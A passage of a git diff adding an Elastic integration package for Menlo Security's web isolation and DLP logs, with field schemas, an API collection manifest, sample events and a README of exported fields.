member. For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`.' + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/menlo/data_stream/web/fields/base-fields.yml b/packages/menlo/data_stream/web/fields/base-fields.yml new file mode 100644 index 00000000000..db401bc6d0f --- /dev/null +++ b/packages/menlo/data_stream/web/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: menlo +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: menlo.web +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/menlo/data_stream/web/fields/ecs.yml b/packages/menlo/data_stream/web/fields/ecs.yml new file mode 100644 index 00000000000..675463fef80 --- /dev/null +++ b/packages/menlo/data_stream/web/fields/ecs.yml @@ -0,0 +1,104 @@ +- external: ecs + name: ecs.version +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.type +- external: ecs + name: destination.domain +- external: ecs + name: error.message +- external: ecs + name: event.id +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.reason +- external: ecs + name: event.severity +- external: ecs + name: dns.answers.data +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.ip +- external: ecs + name: client.geo.country_iso_code +- external: ecs + name: client.ip +- external: ecs + name: network.protocol +- external: ecs + name: observer.geo.country_iso_code +- external: ecs + name: observer.ip +- external: ecs + name: observer.product +- external: ecs + name: observer.vendor +- external: ecs + name: observer.version +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: related.hash +- external: ecs + name: file.name +- external: ecs + name: http.request.method +- external: ecs + name: http.request.mime_type +- external: ecs + name: http.request.referrer +- external: ecs + name: http.response.status_code +- external: ecs + name: message +- external: ecs + name: source.geo.country_iso_code +- external: ecs + name: source.ip +- external: ecs + name: server.geo.country_iso_code +- external: ecs + name: server.ip +- external: ecs + name: tags +- external: ecs + name: url.domain +- external: ecs + name: url.registered_domain +- external: ecs + name: url.top_level_domain +- external: ecs + name: url.original +- external: ecs + name: url.path +- external: ecs + name: url.scheme +- external: ecs + name: url.subdomain +- external: ecs + name: user.name +- external: ecs + name: user_agent.device.name +- external: ecs + name: user_agent.name +- external: ecs + name: user_agent.original +- external: ecs + name: user_agent.os.full +- external: ecs + name: user_agent.os.name +- external: ecs + name: user_agent.os.version +- external: ecs + name: user_agent.version diff --git a/packages/menlo/data_stream/web/fields/fields.yml b/packages/menlo/data_stream/web/fields/fields.yml new file mode 100644 index 00000000000..ea1d7d3c652 --- /dev/null +++ b/packages/menlo/data_stream/web/fields/fields.yml @@ -0,0 +1,81 @@ +- name: menlo + type: group + fields: + - name: web + type: group + fields: + - name: categories + type: keyword + description: "Category Rules Category type classification" + - name: is_iframe + type: boolean + description: "Is inline frame (iframe) element" + - name: has_password + type: boolean + description: "Presence of password in form POST request" + - name: threat_types + type: keyword + description: "Top level risk" + - name: threats + type: keyword + description: "Threat type identified by Menlo Security internal data" + - name: request_type + type: keyword + description: "Request type" + - name: tally + type: long + description: "Count of risks encountered" + - name: ua_type + type: keyword + description: "The type of user agent" + - name: casb_app_name + type: keyword + description: "Cloud application name" + - name: cached + type: boolean + description: "Indicates whether the resource was obtained from the isolated browser’s cache (True) or by downloading from the origin server (False)" + - name: casb_cat_name + type: keyword + description: "Application category ID" + - name: casb_fun_name + type: keyword + description: "Application function name" + - name: casb_org_name + type: keyword + description: "Application organization name" + - name: casb_profile_id + type: keyword + description: "Menlo CASB profile ID" + - name: casb_profile_name + type: keyword + description: "Menlo CASB profile name attached to application or exception rule" + - name: casb_profile_type + type: keyword + description: "Menlo CASB profile type (sanctioned/unsanctioned/unclassified)" + - name: casb_risk_score + type: keyword + description: "Menlo risk score for application (0-10)" + - name: sbox + type: keyword + description: "Sandbox Inspection Result" + - name: sbox_mal_act + type: keyword + description: "List of malicious activities found" + - name: soph + type: keyword + description: "Full file scan result" + - name: tab_id + type: keyword + description: "Tab creation number within a surrogate" + - name: virus_details + type: keyword + description: "Virus detail" + - name: xff_ip + type: keyword + description: "X-Forwarded-For HTTP header field originating client IP address" + - name: content_type + type: keyword + description: "Page type" + - name: risk_score + type: keyword + description: "Risk calculated for URL" diff --git a/packages/menlo/data_stream/web/manifest.yml b/packages/menlo/data_stream/web/manifest.yml new file mode 100644 index 00000000000..7798b84d9d6 --- /dev/null +++ b/packages/menlo/data_stream/web/manifest.yml @@ -0,0 +1,78 @@ +title: Collect Menlo Web from Menlo Security API +type: logs +streams: + - input: cel + title: Menlo Web Logs + description: Collect Menlo Web logs + template_path: input.yml.hbs + vars: + - name: batch_size + type: text + title: Batch Size + description: Batch size for the response of the Menlo Security API. + default: 1000 + required: true + - name: initial_interval + type: text + title: Initial Interval + description: "How far back to pull the events from Menlo Security API. NOTE: Supported units for this parameter are h/m/s." + multi: false + required: true + show_user: true + default: 24h + - name: interval + type: text + title: Interval + description: "Duration between requests to the Menlo Security API. NOTE: Supported units for this parameter are h/m/s." + default: 1m + multi: false + required: true + show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - menlo + - forwarded + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve menlo.web fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false diff --git a/packages/menlo/data_stream/web/sample_event.json b/packages/menlo/data_stream/web/sample_event.json new file mode 100644 index 00000000000..50987014771 --- /dev/null +++ b/packages/menlo/data_stream/web/sample_event.json @@ -0,0 +1,145 @@ +{ + "@timestamp": "2023-11-21T13:12:37.102Z", + "agent": { + "ephemeral_id": "22fb9f42-0c3b-4c46-9fae-06cd89923a5b", + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "data_stream": { + "dataset": "menlo.web", + "namespace": "ep", + "type": "logs" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.18.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web", + "network", + "threat" + ], + "dataset": "menlo.web", + "ingested": "2024-03-28T13:32:25Z", + "kind": "alert", + "outcome": "unknown", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 308 + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=UTF-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "http" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.18.1.2" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.18.1.3", + "192.18.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "tags": [ + "menlo", + "forwarded" + ], + "url": { + "domain": "elastic.co", + "original": "http://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "http", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } +} \ No newline at end of file diff --git a/packages/menlo/docs/README.md b/packages/menlo/docs/README.md new file mode 100644 index 00000000000..e9189d2250d --- /dev/null +++ b/packages/menlo/docs/README.md @@ -0,0 +1,500 @@ +# Menlo Security + +Menlo Security’s isolation-centric approach splits web browsing and document retrieval between the user’s device and an isolated, Disposable Virtual Container (DVC) away from the endpoint. All risky code is executed in the isolated DVC and never reaches the endpoint. Only safe display data is sent to the user’s browser. User traffic is automatically sent to this infrastructure without any impact on the users themselves. + +## Web + +Menlo Security's cloud based Browser Security prevents phishing and malware attacks on any browser and any device across your hybrid enterprise. + +## DLP + +Data Loss Prevention (also known as Data Leak Prevention) detects potential data breaches or data ex-filtration transmissions and prevents them by detecting and optionally blocking sensitive data passing through the Menlo Security platform. + +## Compatibility + +This module has been tested against the Menlo Security API **version 2.0** + +## Data streams + +The Menlo Security integration collects data for the following two events: + +| Event Type | +|-------------------------------| +| Web | +| DLP | + +## Setup + +To collect data through the REST API you will need your Menlo Security API URL and an API token. + +The API token to collect logs must have the *Log Export API* permission + +## Logs Reference + +### Web + +This is the `Web` dataset. + +#### Example + +An example event for `web` looks as following: + +```json +{ + "@timestamp": "2023-11-21T13:12:37.102Z", + "agent": { + "ephemeral_id": "22fb9f42-0c3b-4c46-9fae-06cd89923a5b", + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "data_stream": { + "dataset": "menlo.web", + "namespace": "ep", + "type": "logs" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.18.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web", + "network", + "threat" + ], + "dataset": "menlo.web", + "ingested": "2024-03-28T13:32:25Z", + "kind": "alert", + "outcome": "unknown", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 308 + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=UTF-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "http" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.18.1.2" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.18.1.3", + "192.18.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.18.1.3" + }, + "tags": [ + "menlo", + "forwarded" + ], + "url": { + "domain": "elastic.co", + "original": "http://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "http", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| dns.answers.data | The data describing the resource. The meaning of this data depends on the type and class of the resource record. | keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.id | Unique ID to describe the event. | keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.reason | Reason why this event happened, according to the source. This describes the why of a particular action or outcome captured in the event. Where `event.action` captures the action from the event, `event.reason` describes why that action was taken. For example, a web proxy with an `event.action` which denied the request may also populate `event.reason` with the reason why (e.g. `blocked site`). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | +| http.request.mime_type | Mime type of the body of the request. This value must only be populated based on the content of the request body, not on the `Content-Type` header. Comparing the mime type of a request with the request's Content-Type header can be helpful in detecting threats or misconfigured clients. | keyword | +| http.request.referrer | Referrer for this HTTP request. | keyword | +| http.response.status_code | HTTP response status code. | long | +| input.type | Input type | keyword | +| log.offset | Log offset | long | +| menlo.web.cached | Indicates whether the resource was obtained from the isolated browser’s cache (True) or by downloading from the origin server (False) | boolean | +| menlo.web.casb_app_name | Cloud application name | keyword | +| menlo.web.casb_cat_name | Application category ID | keyword | +| menlo.web.casb_fun_name | Application function name | keyword | +| menlo.web.casb_org_name | Application organization name | keyword | +| menlo.web.casb_profile_id | Menlo CASB profile ID | keyword | +| menlo.web.casb_profile_name | Menlo CASB profile name attached to application or exception rule | keyword | +| menlo.web.casb_profile_type | Menlo CASB profile type (sanctioned/unsanctioned/unclassified) | keyword | +| menlo.web.casb_risk_score | Menlo risk score for application (0-10) | keyword | +| menlo.web.categories | Category Rules Category type classification | keyword | +| menlo.web.content_type | Page type | keyword | +| menlo.web.has_password | Presence of password in form POST request | boolean | +| menlo.web.is_iframe | Is inline frame (iframe) element | boolean | +| menlo.web.request_type | Request type | keyword | +| menlo.web.risk_score | Risk calculated for URL | keyword | +| menlo.web.sbox | Sandbox Inspection Result | keyword | +| menlo.web.sbox_mal_act | List of malicious activities found | keyword | +| menlo.web.soph | Full file scan result | keyword | +| menlo.web.tab_id | Tab creation number within a surrogate | keyword | +| menlo.web.tally | Count of risks encountered | long | +| menlo.web.threat_types | Top level risk | keyword | +| menlo.web.threats | Threat type identified by Menlo Security internal data | keyword | +| menlo.web.ua_type | The type of user agent | keyword | +| menlo.web.virus_details | Virus detail | keyword | +| menlo.web.xff_ip | X-Forwarded-For HTTP header field originating client IP address | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.protocol | In the OSI Model this would be the Application Layer protocol. For example, `http`, `dns`, or `ssh`. The field value must be normalized to lowercase for querying. | keyword | +| observer.geo.country_iso_code | Country ISO code. | keyword | +| observer.ip | IP addresses of the observer. | ip | +| observer.product | The product name of the observer. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| observer.version | Observer version. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| server.geo.country_iso_code | Country ISO code. | keyword | +| server.ip | IP address of the server (IPv4 or IPv6). | ip | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| tags | List of keywords used to tag each event. | keyword | +| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| url.original.text | Multi-field of `url.original`. | match_only_text | +| url.path | Path of the request, such as "/search". | wildcard | +| url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.subdomain | The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. | keyword | +| url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | +| user_agent.device.name | Name of the device. | keyword | +| user_agent.name | Name of the user agent. | keyword | +| user_agent.original | Unparsed user_agent string. | keyword | +| user_agent.original.text | Multi-field of `user_agent.original`. | match_only_text | +| user_agent.os.full | Operating system name, including the version or code name. | keyword | +| user_agent.os.full.text | Multi-field of `user_agent.os.full`. | match_only_text | +| user_agent.os.name | Operating system name, without the version. | keyword | +| user_agent.os.name.text | Multi-field of `user_agent.os.name`. | match_only_text | +| user_agent.os.version | Operating system version as a raw string. | keyword | +| user_agent.version | Version of the user agent. | keyword | + + +### DLP + +This is the `DLP` dataset. + +#### Example + +An example event for `dlp` looks as following: + +```json +{ + "@timestamp": "2024-03-28T13:30:21.204Z", + "agent": { + "ephemeral_id": "1054908a-63b4-46fd-8028-f975d0f878c2", + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "data_stream": { + "dataset": "menlo.dlp", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "action": "block", + "agent_id_status": "verified", + "category": [ + "intrusion_detection", + "network" + ], + "created": "2020-03-09T17:17:22.227Z", + "dataset": "menlo.dlp", + "id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "ingested": "2024-03-28T13:30:33Z", + "kind": "alert", + "outcome": "success", + "severity": 5 + }, + "file": { + "hash": { + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + }, + "name": "more_credit_cards.csv" + }, + "http": { + "request": { + "method": "GET" + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "dlp": { + "alerted": "false", + "category": "Download Sites", + "ccl": { + "id": "CreditordebitcardnumbersGlobal", + "match_counts": 1, + "score": 1 + }, + "status": "dirty", + "stream_name": "/safefile-input/working_file", + "user_input": "false" + } + }, + "observer": { + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "hash": [ + "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + ], + "user": [ + "admin@menlosecurity.com" + ] + }, + "rule": { + "id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099", + "name": "Credit card block rule" + }, + "tags": [ + "menlo", + "forwarded" + ], + "url": { + "domain": "tinynewupload.com", + "original": "http://tinynewupload.com/", + "path": "/", + "registered_domain": "tinynewupload.com", + "scheme": "http", + "top_level_domain": "com" + }, + "user": { + "name": "admin@menlosecurity.com" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.id | Unique ID to describe the event. | keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success 